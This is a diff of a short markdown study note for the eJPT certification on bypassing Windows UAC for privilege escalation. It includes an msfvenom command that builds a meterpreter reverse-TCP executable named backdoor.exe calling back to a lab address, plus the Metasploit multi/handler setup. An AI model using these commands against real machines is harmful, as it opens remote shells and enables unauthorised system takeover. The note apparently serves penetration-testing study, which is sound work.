mehedibiswas/ejpt/Host-based-attacks/Windows/privilege-Escalation/Bypassing -UAC.markdown

 - As our current user is part of administrative group we can use UAC for privilege escalation
 - now back to meterpreter sessions
 - now we need to create msfvenom paylaods so move into new tab
-- msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.2 LPORT= 1234 -f exe >backdoor.exe
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.2 LPORT= 1234 -f exe > 'backdoor.exe'
 - now open msfconsole in new tab
 - use multi/handler
 - set payload windows/meterpreter/reverse_tcp